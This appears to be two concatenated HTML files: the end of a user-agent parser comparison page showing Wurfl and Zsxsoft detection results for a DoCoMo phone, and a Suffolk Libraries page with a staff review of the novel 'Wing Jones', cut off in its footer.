modal-fixed-footer"> <div class="modal-content"> <h4>Wurfl result detail</h4> <p><pre><code class="php">Array ( [virtual] => Array ( [is_android] => false [is_ios] => false [is_windows_phone] => false [is_app] => false [is_full_desktop] => false [is_largescreen] => false [is_mobile] => true [is_robot] => false [is_smartphone] => false [is_touchscreen] => false [is_wml_preferred] => false [is_xhtmlmp_preferred] => true [is_html_preferred] => false [advertised_device_os] => [advertised_device_os_version] => [advertised_browser] => [advertised_browser_version] => [complete_device_name] => DoCoMo [device_name] => DoCoMo [form_factor] => Feature Phone [is_phone] => true [is_app_webview] => false ) [all] => Array ( [brand_name] => DoCoMo [model_name] => [unique] => true [ununiqueness_handler] => [is_wireless_device] => true [device_claims_web_support] => false [has_qwerty_keyboard] => false [can_skip_aligned_link_row] => true [uaprof] => [uaprof2] => [uaprof3] => [nokia_series] => 0 [nokia_edition] => 0 [device_os] => [mobile_browser] => [mobile_browser_version] => [device_os_version] => [pointing_method] => [release_date] => 2002_january [marketing_name] => [model_extra_info] => [nokia_feature_pack] => 0 [can_assign_phone_number] => true [is_tablet] => false [manufacturer_name] => [is_bot] => false [is_google_glass] => false [proportional_font] => false [built_in_back_button_support] => true [card_title_support] => false [softkey_support] => false [table_support] => false [numbered_menus] => false [menu_with_select_element_recommended] => false [menu_with_list_of_links_recommended] => false [icons_on_menu_items_support] => false [break_list_of_links_with_br_element_recommended] => false [access_key_support] => false [wrap_mode_support] => false [times_square_mode_support] => false [deck_prefetch_support] => false [elective_forms_recommended] => false [wizards_recommended] => false [image_as_link_support] => false [insert_br_element_after_widget_recommended] => false [wml_can_display_images_and_text_on_same_line] => false [wml_displays_image_in_center] => false [opwv_wml_extensions_support] => false [wml_make_phone_call_string] => wtai://wp/mc; [chtml_display_accesskey] => true [emoji] => false [chtml_can_display_images_and_text_on_same_line] => false [chtml_displays_image_in_center] => false [imode_region] => ja [chtml_make_phone_call_string] => tel: [chtml_table_support] => false [xhtml_honors_bgcolor] => false [xhtml_supports_forms_in_table] => false [xhtml_support_wml2_namespace] => false [xhtml_autoexpand_select] => false [xhtml_select_as_dropdown] => false [xhtml_select_as_radiobutton] => false [xhtml_select_as_popup] => false [xhtml_display_accesskey] => false [xhtml_supports_invisible_text] => false [xhtml_supports_inline_input] => false [xhtml_supports_monospace_font] => false [xhtml_supports_table_for_layout] => false [xhtml_supports_css_cell_table_coloring] => false [xhtml_format_as_css_property] => false [xhtml_format_as_attribute] => false [xhtml_nowrap_mode] => false [xhtml_marquee_as_css_property] => false [xhtml_readable_background_color1] => #FFFFFF [xhtml_readable_background_color2] => #FFFFFF [xhtml_allows_disabled_form_elements] => false [xhtml_document_title_support] => true [xhtml_preferred_charset] => utf8 [opwv_xhtml_extensions_support] => false [xhtml_make_phone_call_string] => tel: [xhtmlmp_preferred_mime_type] => application/vnd.wap.xhtml+xml [xhtml_table_support] => false [xhtml_send_sms_string] => none [xhtml_send_mms_string] => none [xhtml_file_upload] => not_supported [cookie_support] => true [accept_third_party_cookie] => true [xhtml_supports_iframe] => none [xhtml_avoid_accesskeys] => false [xhtml_can_embed_video] => none [ajax_support_javascript] => false [ajax_manipulate_css] => false [ajax_support_getelementbyid] => false [ajax_support_inner_html] => false [ajax_xhr_type] => none [ajax_manipulate_dom] => false [ajax_support_events] => false [ajax_support_event_listener] => false [ajax_preferred_geoloc_api] => none [xhtml_support_level] => 1 [preferred_markup] => docomo_imode_html_3 [wml_1_1] => true [wml_1_2] => false [wml_1_3] => false [html_wi_w3_xhtmlbasic] => true [html_wi_oma_xhtmlmp_1_0] => true [html_wi_imode_html_1] => true [html_wi_imode_html_2] => false [html_wi_imode_html_3] => false [html_wi_imode_html_4] => false [html_wi_imode_html_5] => false [html_wi_imode_htmlx_1] => false [html_wi_imode_htmlx_1_1] => false [html_wi_imode_compact_generic] => true [html_web_3_2] => false [html_web_4_0] => false [voicexml] => false [multipart_support] => false [total_cache_disable_support] => false [time_to_live_support] => false [resolution_width] => 240 [resolution_height] => 320 [columns] => 8 [max_image_width] => 240 [max_image_height] => 320 [rows] => 6 [physical_screen_width] => 27 [physical_screen_height] => 27 [dual_orientation] => false [density_class] => 1.0 [wbmp] => false [bmp] => false [epoc_bmp] => false [gif_animated] => false [jpg] => false [png] => false [tiff] => false [transparent_png_alpha] => false [transparent_png_index] => false [svgt_1_1] => false [svgt_1_1_plus] => false [greyscale] => false [gif] => true [colors] => 262144 [webp_lossy_support] => false [webp_lossless_support] => false [post_method_support] => true [basic_authentication_support] => true [empty_option_value_support] => true [emptyok] => false [nokia_voice_call] => false [wta_voice_call] => false [wta_phonebook] => false [wta_misc] => false [wta_pdc] => false [https_support] => true [phone_id_provided] => false [max_data_rate] => 9 [wifi] => false [sdio] => false [vpn] => false [has_cellular_radio] => true [max_deck_size] => 5000 [max_url_length_in_requests] => 512 [max_url_length_homepage] => 100 [max_url_length_bookmark] => 100 [max_url_length_cached_page] => 0 [max_no_of_connection_settings] => 0 [max_no_of_bookmarks] => 0 [max_length_of_username] => 256 [max_length_of_password] => 20 [max_object_size] => 0 [downloadfun_support] => false [directdownload_support] => false [inline_support] => false [oma_support] => false [ringtone] => false [ringtone_3gpp] => false [ringtone_midi_monophonic] => false [ringtone_midi_polyphonic] => false [ringtone_imelody] => false [ringtone_digiplug] => false [ringtone_compactmidi] => false [ringtone_mmf] => false [ringtone_rmf] => false [ringtone_xmf] => false [ringtone_amr] => false [ringtone_awb] => false [ringtone_aac] => false [ringtone_wav] => false [ringtone_mp3] => false [ringtone_spmidi] => false [ringtone_qcelp] => false [ringtone_voices] => 1 [ringtone_df_size_limit] => 0 [ringtone_directdownload_size_limit] => 0 [ringtone_inline_size_limit] => 0 [ringtone_oma_size_limit] => 0 [wallpaper] => false [wallpaper_max_width] => 0 [wallpaper_max_height] => 0 [wallpaper_preferred_width] => 0 [wallpaper_preferred_height] => 0 [wallpaper_resize] => none [wallpaper_wbmp] => false [wallpaper_bmp] => false [wallpaper_gif] => false [wallpaper_jpg] => false [wallpaper_png] => false [wallpaper_tiff] => false [wallpaper_greyscale] => false [wallpaper_colors] => 2 [wallpaper_df_size_limit] => 0 [wallpaper_directdownload_size_limit] => 0 [wallpaper_inline_size_limit] => 0 [wallpaper_oma_size_limit] => 0 [screensaver] => false [screensaver_max_width] => 0 [screensaver_max_height] => 0 [screensaver_preferred_width] => 0 [screensaver_preferred_height] => 0 [screensaver_resize] => none [screensaver_wbmp] => false [screensaver_bmp] => false [screensaver_gif] => false [screensaver_jpg] => false [screensaver_png] => false [screensaver_greyscale] => false [screensaver_colors] => 2 [screensaver_df_size_limit] => 0 [screensaver_directdownload_size_limit] => 0 [screensaver_inline_size_limit] => 0 [screensaver_oma_size_limit] => 0 [picture] => false [picture_max_width] => 0 [picture_max_height] => 0 [picture_preferred_width] => 0 [picture_preferred_height] => 0 [picture_resize] => none [picture_wbmp] => false [picture_bmp] => false [picture_gif] => false [picture_jpg] => false [picture_png] => false [picture_greyscale] => false [picture_colors] => 2 [picture_df_size_limit] => 0 [picture_directdownload_size_limit] => 0 [picture_inline_size_limit] => 0 [picture_oma_size_limit] => 0 [video] => false [oma_v_1_0_forwardlock] => false [oma_v_1_0_combined_delivery] => false [oma_v_1_0_separate_delivery] => false [streaming_video] => false [streaming_3gpp] => false [streaming_mp4] => false [streaming_mov] => false [streaming_video_size_limit] => 0 [streaming_real_media] => none [streaming_flv] => false [streaming_3g2] => false [streaming_vcodec_h263_0] => -1 [streaming_vcodec_h263_3] => -1 [streaming_vcodec_mpeg4_sp] => -1 [streaming_vcodec_mpeg4_asp] => -1 [streaming_vcodec_h264_bp] => -1 [streaming_acodec_amr] => none [streaming_acodec_aac] => none [streaming_wmv] => none [streaming_preferred_protocol] => rtsp [streaming_preferred_http_protocol] => none [wap_push_support] => false [connectionless_service_indication] => false [connectionless_service_load] => false [connectionless_cache_operation] => false [connectionoriented_unconfirmed_service_indication] => false [connectionoriented_unconfirmed_service_load] => false [connectionoriented_unconfirmed_cache_operation] => false [connectionoriented_confirmed_service_indication] => false [connectionoriented_confirmed_service_load] => false [connectionoriented_confirmed_cache_operation] => false [utf8_support] => false [ascii_support] => false [iso8859_support] => false [expiration_date] => false [j2me_cldc_1_0] => false [j2me_cldc_1_1] => false [j2me_midp_1_0] => false [j2me_midp_2_0] => false [doja_1_0] => false [doja_1_5] => false [doja_2_0] => false [doja_2_1] => false [doja_2_2] => false [doja_3_0] => false [doja_3_5] => false [doja_4_0] => false [j2me_jtwi] => false [j2me_mmapi_1_0] => false [j2me_mmapi_1_1] => false [j2me_wmapi_1_0] => false [j2me_wmapi_1_1] => false [j2me_wmapi_2_0] => false [j2me_btapi] => false [j2me_3dapi] => false [j2me_locapi] => false [j2me_nokia_ui] => false [j2me_motorola_lwt] => false [j2me_siemens_color_game] => false [j2me_siemens_extension] => false [j2me_heap_size] => 0 [j2me_max_jar_size] => 0 [j2me_storage_size] => 0 [j2me_max_record_store_size] => 0 [j2me_screen_width] => 0 [j2me_screen_height] => 0 [j2me_canvas_width] => 0 [j2me_canvas_height] => 0 [j2me_bits_per_pixel] => 0 [j2me_audio_capture_enabled] => false [j2me_video_capture_enabled] => false [j2me_photo_capture_enabled] => false [j2me_capture_image_formats] => none [j2me_http] => false [j2me_https] => false [j2me_socket] => false [j2me_udp] => false [j2me_serial] => false [j2me_gif] => false [j2me_gif89a] => false [j2me_jpg] => false [j2me_png] => false [j2me_bmp] => false [j2me_bmp3] => false [j2me_wbmp] => false [j2me_midi] => false [j2me_wav] => false [j2me_amr] => false [j2me_mp3] => false [j2me_mp4] => false [j2me_imelody] => false [j2me_rmf] => false [j2me_au] => false [j2me_aac] => false [j2me_realaudio] => false [j2me_xmf] => false [j2me_wma] => false [j2me_3gpp] => false [j2me_h263] => false [j2me_svgt] => false [j2me_mpeg4] => false [j2me_realvideo] => false [j2me_real8] => false [j2me_realmedia] => false [j2me_left_softkey_code] => 0 [j2me_right_softkey_code] => 0 [j2me_middle_softkey_code] => 0 [j2me_select_key_code] => 0 [j2me_return_key_code] => 0 [j2me_clear_key_code] => 0 [j2me_datefield_no_accepts_null_date] => false [j2me_datefield_broken] => false [receiver] => false [sender] => false [mms_max_size] => 0 [mms_max_height] => 0 [mms_max_width] => 0 [built_in_recorder] => false [built_in_camera] => false [mms_jpeg_baseline] => false [mms_jpeg_progressive] => false [mms_gif_static] => false [mms_gif_animated] => false [mms_png] => false [mms_bmp] => false [mms_wbmp] => false [mms_amr] => false [mms_wav] => false [mms_midi_monophonic] => false [mms_midi_polyphonic] => false [mms_midi_polyphonic_voices] => 0 [mms_spmidi] => false [mms_mmf] => false [mms_mp3] => false [mms_evrc] => false [mms_qcelp] => false [mms_ota_bitmap] => false [mms_nokia_wallpaper] => false [mms_nokia_operatorlogo] => false [mms_nokia_3dscreensaver] => false [mms_nokia_ringingtone] => false [mms_rmf] => false [mms_xmf] => false [mms_symbian_install] => false [mms_jar] => false [mms_jad] => false [mms_vcard] => false [mms_vcalendar] => false [mms_wml] => false [mms_wbxml] => false [mms_wmlc] => false [mms_video] => false [mms_mp4] => false [mms_3gpp] => false [mms_3gpp2] => false [mms_max_frame_rate] => 0 [nokiaring] => false [picturemessage] => false [operatorlogo] => false [largeoperatorlogo] => false [callericon] => false [nokiavcard] => false [nokiavcal] => false [sckl_ringtone] => false [sckl_operatorlogo] => false [sckl_groupgraphic] => false [sckl_vcard] => false [sckl_vcalendar] => false [text_imelody] => false [ems] => false [ems_variablesizedpictures] => false [ems_imelody] => false [ems_odi] => false [ems_upi] => false [ems_version] => 0 [siemens_ota] => false [siemens_logo_width] => 101 [siemens_logo_height] => 29 [siemens_screensaver_width] => 101 [siemens_screensaver_height] => 50 [gprtf] => false [sagem_v1] => false [sagem_v2] => false [panasonic] => false [sms_enabled] => false [wav] => false [mmf] => false [smf] => false [mld] => false [midi_monophonic] => false [midi_polyphonic] => false [sp_midi] => false [rmf] => false [xmf] => false [compactmidi] => false [digiplug] => false [nokia_ringtone] => false [imelody] => false [au] => false [amr] => false [awb] => false [aac] => false [mp3] => false [voices] => 1 [qcelp] => false [evrc] => false [flash_lite_version] => 1_1 [fl_wallpaper] => false [fl_screensaver] => false [fl_standalone] => false [fl_browser] => false [fl_sub_lcd] => false [full_flash_support] => false [css_supports_width_as_percentage] => true [css_border_image] => none [css_rounded_corners] => none [css_gradient] => none [css_spriting] => false [css_gradient_linear] => none [is_transcoder] => false [transcoder_ua_header] => user-agent [rss_support] => false [pdf_support] => false [progressive_download] => true [playback_vcodec_h263_0] => -1 [playback_vcodec_h263_3] => -1 [playback_vcodec_mpeg4_sp] => -1 [playback_vcodec_mpeg4_asp] => -1 [playback_vcodec_h264_bp] => 1 [playback_real_media] => none [playback_3gpp] => true [playback_3g2] => false [playback_mp4] => false [playback_mov] => false [playback_acodec_amr] => nb [playback_acodec_aac] => lc [playback_df_size_limit] => 0 [playback_directdownload_size_limit] => 0 [playback_inline_size_limit] => 0 [playback_oma_size_limit] => 0 [playback_acodec_qcelp] => false [playback_wmv] => none [hinted_progressive_download] => false [html_preferred_dtd] => xhtml_mp1 [viewport_supported] => false [viewport_width] => [viewport_userscalable] => [viewport_initial_scale] => [viewport_maximum_scale] => [viewport_minimum_scale] => [mobileoptimized] => false [handheldfriendly] => false [canvas_support] => none [image_inlining] => false [is_smarttv] => false [is_console] => false [nfc_support] => false [ux_full_desktop] => false [jqm_grade] => none [is_sencha_touch_ok] => false ) ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>Zsxsoft<br /><small>1.3</small><br /></td><td>DoCoMo 2.0</td><td><i class="material-icons">close</i></td><td> </td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-5d43e024-b46c-44f6-8914-529b05569bc2">Detail</a> <!-- Modal Structure --> <div id="modal-5d43e024-b46c-44f6-8914-529b05569bc2" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>Zsxsoft result detail</h4> <p><pre><code class="php">Array ( [browser] => Array ( [link] => http://www.nttdocomo.com/ [title] => DoCoMo 2.0 [code] => null [version] => 2.0 [name] => DoCoMo [image] => img/16/browser/null.png ) [os] => Array ( [link] => [name] => [version] => [code] => null [x64] => [title] => [type] => os [dir] => os [image] => img/16/os/null.png ) [device] => Array ( [link] => # [title] => Unknown [code] => null [dir] => browser [type] => os [image] => img/16/browser/null.png ) [platform] => Array ( [link] => # [title] => Unknown [code] => null [dir] => browser [type] => os [image] => img/16/browser/null.png ) ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr></table> </div> <div class="section"> <h1 class="header center orange-text">About this comparison</h1> <div class="row center"> <h5 class="header light"> The primary goal of this project is simple<br /> I wanted to know which user agent parser is the most accurate in each part - device detection, bot detection and so on...<br /> <br /> The secondary goal is to provide a source for all user agent parsers to improve their detection based on this results.<br /> <br /> You can also improve this further, by suggesting ideas at <a href="https://github.com/ThaDafinser/UserAgentParserComparison">ThaDafinser/UserAgentParserComparison</a><br /> <br /> The comparison is based on the abstraction by <a href="https://github.com/ThaDafinser/UserAgentParser">ThaDafinser/UserAgentParser</a> </h5> </div> </div> <div class="card"> <div class="card-content"> Comparison created <i>2016-05-10 08:06:17</i> | by <a href="https://github.com/ThaDafinser">ThaDafinser</a> </div> </div> </div> <script src="https://code.jquery.com/jquery-2.1.4.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.3/js/materialize.min.js"></script> <script src="http://cdnjs.cloudflare.com/ajax/libs/list.js/1.2.0/list.min.js"></script> <script> $(document).ready(function(){ // the "href" attribute of .modal-trigger must specify the modal ID that wants to be triggered $('.modal-trigger').leanModal(); }); </script> </body> </html>
ThaDafinser/UserAgentParserComparison
v5/user-agent-detail/ba/2e/ba2efb11-d9a9-4489-8474-c5e519c9d172.html
HTML
mit
46,068
<!doctype html> <html lang="en-gb"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <!--[if lt IE 9]> <script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv-printshiv.min.js"></script> <![endif]--> <title>Wing Jones by Katherine Webber &#8211; Suffolk Libraries</title> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:site" content="@suffolklibrary"> <meta name="twitter:title" content="Wing Jones by Katherine Webber"> <meta name="twitter:description" content="Emma loved Wing Jones and is excited to read Katherine Webber's future work"> <meta name="twitter:image" content="/images/featured/featured-wing-jones.jpg"> <meta name="twitter:image:alt" content="Wing Jones"> <link rel="stylesheet" href="/css/style.css"> <link rel="preload" as="font" type="font/woff2" href="/fonts/source-sans-pro-v11-latin-regular.woff2"> <link rel="preload" as="font" type="font/woff2" href="/fonts/source-sans-pro-v11-latin-italic.woff2"> <link rel="preload" as="font" type="font/woff2" href="/fonts/source-sans-pro-v11-latin-700.woff2"> </head> <body class="custom-sans-serif lh-copy dark-gray bg-moon-gray"> <ul class="clip"> <li><a href="#content">Skip to content</a></li> <li><a href="#footer-nav">Skip to navigation menu</a></li> </ul> <div class="bg-black white pa2 ph3-ns"> <div class="custom-max-width"> <p class="f6 ma0 custom-lh-title"><span role='image' aria-label='Debit card' class='pr1'>💳</span> You can now pay online. <a href=" https://suffolk.spydus.co.uk/cgi-bin/spydus.exe/MSGTRN/OPAC/LOGINB?RDT=/SpydusCitizenPay/default.aspx " class="underline lightest-blue"> Pay charges now &rarr; </a></p> </div> </div> <header id="site-header" class="custom-lh-title"> <div class="bg-white dark-gray ph2 ph3-ns pt2 pt3-ns"> <div class="custom-max-width flex"> <div class="w-30"> <a href="/"><img src="/images/logos/sl.svg" class="v-btm w3 w4-ns" alt="Suffolk Libraries"></a> </div> <div class="w-70 flex justify-end items-center"> <div><a href="/support-us/" class="dib blue pv1 pv2-ns f7 f6-ns pr2">Donate</a></div> <div><a href="/help/joining-the-library/" class="dib custom-icon custom-icon-card blue pv1 pv2-ns f7 f6-ns">Join</a></div> <div><a href="https://suffolk.spydus.co.uk/cgi-bin/spydus.exe/MSGTRN/OPAC/LOGINB" class="dib custom-icon custom-icon-lock blue pv1 pv2-ns ml2 f7 f6-ns">Login</a></div> <div><a href="/search-form/" class="dib custom-icon custom-icon-search blue ml2 pv1 pv2-ns f7 f6-ns">Search</a></div> </div> </div> </div> <div class="custom-bg-corporate white ph2 ph3-ns bb b--white"> <div class="custom-max-width"> <ul class="ma0 pa0 list f6"> <li class="dib mr2 mr3-l"><a href="/" class="white underline db pv2">Home</a></li> <li class="dib mr2 mr3-l"><a href="/elibrary/" class="white underline db pv2">eLibrary</a></li> <li class="dib mr2 mr3-l"><a href="/events-activities/online-and-streamed-events/" class="white underline db pv2">Online events</a></li> <li class="dib mr2 mr3-l"><a href="/help/" class="white underline db pv2">Help</a></li> <li class="dib mr2 mr3-l"><a href="/contact/" class="white underline db pv2">Contact</a></li> <!-- <li class="dib mr2 mr3-l"><a href="/about/" class="white underline db pv2">About</a></li> <li class="dib"><a class="white underline db pv2" href="/support-us/">Donate</a></li> --> </ul> </div> </div> </header> <div class="pv2 pv3-ns cf custom-max-width "> <main id="content" role="main"> <div class="custom-g-l4"> <article> <div class="bg-white pa2 pa5-ns pv4-ns cf mb2 border-box b--light-gray "> <div class="pa2 ph3-ns bg-white ba b--light-gray custom-underline f6"> <a class="blue underline" href="/">Home</a> → <a class="blue underline" href="/new-suggestions/">New suggestions</a> → <a class="blue underline" href="/new-suggestions/young-adult/">Young adult</a> → Wing Jones by Katherine Webber </div> <header class="mt3"> <h1 itemprop="name headline"class="custom-lh-title f2 pa0 ma0 mb3 }">Wing Jones by Katherine Webber</h1> <p class="f6 mid-gray"> Written by <span itemprop="author" itemscope itemtype="http://schema.org/Person"><span itemprop="name">Emma Maguire</span></span> &middot; Published Apr 27, 2017 &middot; Filed under <a class="blue" href="/new-suggestions/reviews/genre/literary-fiction">Literary fiction</a> </p> </header> <div itemprop="articleBody"class="lh-copy custom-hyphens custom-prose custom-underline custom-visited"> <p><img src="/images/featured/featured-wing-jones.jpg" alt="Wing Jones" /></p> <p><strong><a href="https://suffolk.spydus.co.uk/cgi-bin/spydus.exe/ENQ/OPAC/BIBENQ?BRN=2078815">See <cite>Wing Jones</cite> in our catalogue</a>.</strong></p> <p>Wing has always been in the shadow of her football-playing popular brother. She doesn’t look like anyone else, and the one friend she did have moved away. When tragedy strikes the family, Wing discovers she can run - fast!</p> <p>Wing finds a place to fit in, makes new friends, and Aaron becomes more than just her brother’s best friend. Wing discovers against incredible pain you can find happiness - and her talent might just help her family too.</p> <p>I loved <cite>Wing Jones</cite>, and I couldn’t put it down. I will be keeping an eye out for anything else Katherine Webber writes. Read this book, it’s one of my favourites so far this year!</p> <footer> <footer class="pb4 pb5-ns pt3 bt b--light-gray"> <h1 class="f4 ma0 pa0 pb1">Emma Maguire</a></h1> <p class="ma0">I'm a library and information advisor.</p> </footer> </footer> </div> </div> </article> </div> </main> <div class="custom-g-l2 custom-g-nm custom-underline"> <aside id="sidebar" class="bg-white pa2 pa5-ns pv4-ns cf mb2 border-box b--light-gray custom-constrain-img" role="complementary"> <section class="pb3 pb4-ns "> <h1 class="ma0 pb2 f5 f4-ns fw6 ">About our Young Adult section</h1> <p class="ma0 mb2 f6 f5-ns">Book reviews, reading suggestions and blog posts from our staff and young adult readers. Want to write for our website? Email us at <strong>help@suffolklibraries.co.uk</strong>.</p> </section> <section class="pb3 pb4-ns "> <h1 class="ma0 pb2 f5 f4-ns fw6 ">More Young adult</h1> <ul class="pa0 ma0 list mb2 f6 f5-ns "> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/young-adult/new-young-adult-for-march-2020/">New Young Adult books for March 2020</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/young-adult/wranglestone-by-darren-charlton/">Wranglestone by Darren Charlton</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/young-adult/lgbt-history-month-2020/">Recommended Young Adult titles to mark LGBT History Month 2020</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/young-adult/with-the-fire-on-high-by-elizabeth-acevedo/">With the Fire on High by Elizabeth Acevedo</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/young-adult/new-young-adult-for-february-2020/">New Young Adult books for February 2020</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/young-adult/the-poet-x-by-elizabeth-acevedo/">The Poet X by Elizabeth Acevedo</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/young-adult/read-for-empathy-ya-2020/">Find your new favourite book with the 2020 Read for Empathy YA book collection</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/young-adult/the-deathless-girls-by-kiran-millwood-hargrave/">The Deathless Girls by Kiran Millwood Hargrave</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/young-adult/the-beautiful-by-renee-ahdieh/">The Beautiful by Renée Ahdieh</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/young-adult/ya-comic-books/">Feast your eyes on our stunning Young Adult comic books</a></li> </ul> </section> <section class="pb3 pb4-ns "> <h1 class="ma0 pb2 f5 f4-ns fw6 ">More suggestions</h1> <ul class="pa0 ma0 list mb2 f6 f5-ns "> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/fiction/">Fiction</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/audiobooks/">Audiobooks</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/films-dvds/">Films &amp; DVDs</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/elibrary-picks/">eLibrary picks</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/childrens-ya-books/">Children's books</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/young-adult/">Young adult</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/non-fiction/">Non-fiction</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/music/">Music</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/meet-the-author/">Meet the Author interviews</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/articles/">Articles</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/health-lists/"> Health and wellbeing</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/reviews/">Reviews</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="/new-suggestions/book-club/">Book club favourites</a></li> </ul> </section> <section class="pb3 pb4-ns "> <h1 class="ma0 pb2 f5 f4-ns fw6 ">Keep updated</h1> <p class="ma0 mb2 f6 f5-ns">Get the latest suggestions, releases and reviews delivered straight to you.</p> <ul class="pa0 ma0 list mb2 f6 f5-ns "> <li class="pv2 bt b--light-gray "><a class="blue link " href="/newsletter/">Email newsletter</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="https://facebook.com/suffolklibraries">Facebook</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="https://twitter.com/suffolklibrary">Twitter</a></li> <li class="pv2 bt b--light-gray "><a class="blue link " href="https://instagram.com/suffolklibraries">Instagram</a></li> </ul> </section> </aside> </div> </div> <footer id="footer" class="pa2 pt3 pa3-ns pt4-ns bg-near-black white custom-underline"> <div class="custom-max-width"> <div class="flex-l justify-between-l"> <div class="w-30-l mb4 f6"> <section class="pb4"> <h2 class="f6 f5-ns pa0 ma0 mb2 tracked ttu normal ">Do it online</h2> <ul class="list pa0 ma0"> <li class="mb2 mb1-ns"><a href="https://suffolk.spydus.co.uk" class="link light-gray hover-white">Search &amp; reserve</a></li> <li class="mb2 mb1-ns"><a href="https://suffolk.spydus.co.uk/cgi-bin/spydus.exe/MSGTRN/OPAC/LOGINB" class="link light-gray hover-white">Login &amp; renew</a></li> <li class="mb2 mb1-ns"><a class="link light-gray hover-white" href="/elibrary">eLibrary</a></li> <li class="mb2 mb1-ns"><a href="/help/joining-the-library/" class="link light-gray hover-white">Get a library card</a></li> </ul> </section> <section class="pb4"> <h2 class="f6 f5-ns pa0 ma0 mb2 tracked ttu normal ">Support your library</h2> <p>We're a charity that makes life in Suffolk better for thousands of people.</p> <p class="ma0"><a class="b pa1 br2 custom-bg-corporate-green hover-bg-green white custom-no-underline" href="/support-us">Donate</a></p> </section> </div> <div class="w-30-l mb4 f6"> <section class="pb4"> <h2 class="f6 f5-ns pa0 ma0 mb2 tracked ttu normal ">Contact us</h2> <ul class="list pa0 ma0"> <li class="mb2 mb1-ns"><a href="tel:01473351249" class="link light-gray hover-white">01473 351249</a></li> <li class="mb2 mb1-ns"><a href="mailto:help@suffolklibraries.co.uk" class="link light-gray hover-white">help@suffolklibraries.co.uk</a></li> </ul> </section> <section class="pb4"> <h2 class="f6 f5-ns pa0 ma0 mb2 tracked ttu normal ">Social media</h2> <ul class="list pa0 ma0"> <li class="mb2 mb1-ns"><a href="http://facebook.com/suffolklibraries" class="link light-gray hover-white">Facebook</a></li> <li class="mb2 mb1-ns"><a href="https://www.youtube.com/user/SuffolkLibraries/" class="link light-gray hover-white">YouTube</a></li> <li class="mb2 mb1-ns"><a href="http://twitter.com/suffolklibrary" class="link light-gray hover-white">Twitter</a></li> <li class="mb2 mb1-ns"><a href="https://instagram.com/suffolklibraries" class="link light-gray hover-white">Instagram</a></li> <li class="mb2 mb1-ns"><a href="https://www.linkedin.com/company/suffolk-libraries/" class="link light-gray hover-white">LinkedIn</a></li> <li class="mb2 mb1-ns"><a href="/newsletter" class="link light-gray hover-white">Email newsletter</a></li> </ul> </section> </div> <div class="w-30-l mb4 f6"> <nav class="pb4" id="footer-nav"> <h2 class="f6 f5-ns pa0 ma0 mb2 tracked ttu normal ">Sections</h2> <ul class="list pa0 ma0"> <li class="mb2 mb1-ns"><a href="/elibrary/" class="link light-gray hover-white">eLibrary</a></li> <li class="mb2 mb1-ns"><a href="/libraries/" class="link light-gray hover-white">Libraries</a></li> <li class="mb2 mb1-ns"><a href="/mobiles-home/" class="link light-gray hover-white">Mobile &amp; home service</a></li> <li class="mb2 mb1-ns"><a href="/help/" class="link light-gray hover-white">Help using the service</a></li> <li class="mb2 mb1-ns"><a href="/new-suggestions/" class="link light-gray hover-white">Recommendations &amp; reviews</a></li> <li class="mb2 mb1-ns"><a href="/events-activities/" class="link light-gray hover-white">Events &amp; activities</a></li> <li class="mb2 mb1-ns"><a href="/research-and-reference/" class="link light-gray hover-white">Research &amp; reference</a></li> <li class="mb2 mb1-ns"><a href="/parents-carers-and-children/" class="link light-gray hover-white">Parents, carers &amp; children</a></li> <li class="mb2 mb1-ns"><a href="/teachers-and-home-educators/" class="link light-gray hover-white">Teachers &amp; home educators</a></li> <li class="mb2 mb1-ns"><a href="/health/" class="link light-gray hover-white">Health &amp; wellbeing</a></li> <li class="mb2 mb1-ns"><a href="/help-with-reading-and-literacy/" class="link light-gray hover-white">Help with reading &amp; literacy</a></li> <li class="mb2 mb1-ns"><a href="/work-and-benefits/" class="link light-gray hover-white">Work &amp; benefits</a></li> <li class="mb2 mb1-ns"><a href="/business-and-room-hire/" class="link light-gray hover-white">Business 